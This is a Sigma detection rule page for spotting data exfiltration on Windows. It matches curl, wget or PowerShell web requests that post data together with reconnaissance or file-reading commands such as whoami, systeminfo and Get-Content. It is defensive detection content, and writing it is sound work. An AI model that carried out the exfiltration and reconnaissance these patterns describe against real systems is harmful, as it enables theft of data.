Potential Data Exfiltration Activity Via CommandLine Tools
Detects the use of various CLI utilities exfiltrating data via web requests
Sigma rule (View on GitHub)
1title: Potential Data Exfiltration Activity Via CommandLine Tools
2id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
3status: test
4description: Detects the use of various CLI utilities exfiltrating data via web requests
5references:
6 - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2022-08-02
9modified: 2025-07-18
10tags:
11 - attack.execution
12 - attack.t1059.001
13logsource:
14 category: process_creation
15 product: windows
16detection:
17 selection_iwr:
18 Image|endswith:
19 - '\powershell_ise.exe'
20 - '\powershell.exe'
21 - '\pwsh.exe'
22 - '\cmd.exe'
23 CommandLine|contains:
24 - 'curl '
25 - 'Invoke-RestMethod'
26 - 'Invoke-WebRequest'
27 - 'irm '
28 - 'iwr '
29 - 'wget '
30 CommandLine|contains|all:
31 - ' -ur' # Shortest possible version of the -uri flag
32 - ' -me' # Shortest possible version of the -method flag
33 - ' -b'
34 - ' POST '
35 selection_curl:
36 Image|endswith: '\curl.exe'
37 CommandLine|contains: '--ur' # Shortest possible version of the --uri flag
38 selection_curl_data:
39 CommandLine|contains:
40 - ' -d ' # Shortest possible version of the --data flag
41 - ' --data '
42 selection_wget:
43 Image|endswith: '\wget.exe'
44 CommandLine|contains:
45 - '--post-data'
46 - '--post-file'
47 payloads:
48 - CommandLine|contains:
49 - 'Get-Content'
50 - 'GetBytes'
51 - 'hostname'
52 - 'ifconfig'
53 - 'ipconfig'
54 - 'net view'
55 - 'netstat'
56 - 'nltest'
57 - 'qprocess'
58 - 'sc query'
59 - 'systeminfo'
60 - 'tasklist'
61 - 'ToBase64String'
62 - 'whoami'
63 - CommandLine|contains|all:
64 - 'type '
65 - ' > '
66 - ' C:\'
67 condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
68falsepositives:
69 - Unlikely
70level: high
References
Related rules
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Usage Of Web Request Commands And Cmdlets
- Usage Of Web Request Commands And Cmdlets - ScriptBlock
- Malicious PowerShell Commandlets - PoshModule
- Malicious PowerShell Commandlets - ProcessCreation